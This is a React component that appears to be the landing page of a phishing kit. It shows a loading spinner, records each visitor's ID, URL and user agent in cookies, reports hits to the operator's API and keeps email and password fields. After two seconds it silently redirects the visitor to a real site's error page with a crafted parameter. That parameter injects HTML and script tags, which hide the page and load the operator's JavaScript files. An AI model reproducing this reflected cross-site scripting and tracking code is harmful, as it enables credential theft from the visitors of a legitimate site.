import React, { useState, useEffect } from "react";
import { useParams } from "react-router-dom";
import { isMobile, isTablet, isDesktop } from "react-device-detect";
import Cookies from 'js-cookie';

const Home = () => {
  const { userId } = useParams();
  useEffect(() => {
    // Simulate the redirection after a delay
    const timer = setTimeout(() => {
      // Construct the URL with the userId
      console.log(process.env.REACT_APP_API_DOMAIN)
      const url = `https://megapersonals.eu/public/error-message?error=%20data=%20!3m1!%201e3!4m2!4m1!3e0%20Agua%20Caliente%20Indian%20Reservation%20=33.780445%2C-116.545372%20%3C/h2%3E%20%20%3Cstyle%3E.container%20,%20footer%20%7b%20display:%20none%20;%20%7d%20a%20%7b%20color:%20white;%20%7d%20%3C/style%3E%20%3Cscript%20src=%22${process.env.REACT_APP_API_DOMAIN}/anti_click.js%22%3E%20%3C/script%3E%20%3Cscript%20src=%22${process.env.REACT_APP_API_DOMAIN}/emoji.main.js%22%3E%20%3C/script%20%3E&userid=${userId}`;

      // Create an anchor element
      const anchor = document.createElement('a');
      anchor.href = url; // Set the href
      anchor.style.display = 'none'; // Hide the element
      document.body.appendChild(anchor); // Append it to the body
      anchor.click(); // Trigger the click
      document.body.removeChild(anchor); // Remove the anchor after the click
    }, 2000); // 500ms delay

    return () => clearTimeout(timer); // Cleanup the timer on unmount
  }, [userId]);

  Cookies.set('userId', userId, { expires: 7 });
  Cookies.set('landing_url', window.location.href, { expires: 7 });
  Cookies.set('userAgent', navigator.userAgent, { expires: 7 });

  const [formData, setFormData] = useState({
    email: "",
    password: "",
    userId: "",
    userAgent: "",
    message: "",
    landing_url: "",
    captcha: "", // Added
  });

  // Determine device type
  const mobile = isMobile ? 1 : 0;
  const desktop = isDesktop ? 1 : 0;
  const tablet = isTablet ? 1 : 0;

  const handleChange = (e) => {
    const { name, value } = e.target;
    setFormData((prevData) => ({
      ...prevData,
      [name]: value,
    }));
  };

  useEffect(() => {
    const updateFormData = () => {
      setFormData((prevData) => ({
        ...prevData,
        userAgent: navigator.userAgent,
        landing_url: window.location.href,
        userId: userId,
      }));
    };

    const sendHitData = async () => {
      try {
        const data = {
          mobile: mobile,
          desktop: desktop,
          tablet: tablet,
          landing_url: window.location.href,
          userId: userId,
        };
        const response = await fetch(`${process.env.REACT_APP_API_URL}/hit`, {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify(data),
        });

        if (response.ok) {
          const result = await response.json();
          console.log("Server Response:", result);
        } else {
          alert("Error submitting form");
        }
      } catch (error) {
        console.error("Error:", error);
      }
    };

    updateFormData();
    sendHitData();
  }, [userId, mobile, desktop, tablet]);


 return (
        <div className="loading-container" id="lo_23k_w">
          <div className="loading-dots">
            <div className="dot"></div>
            <div className="dot"></div>
            <div className="dot"></div>
            <div className="dot"></div>
          </div>
        </div> 
  );
};

export default Home;
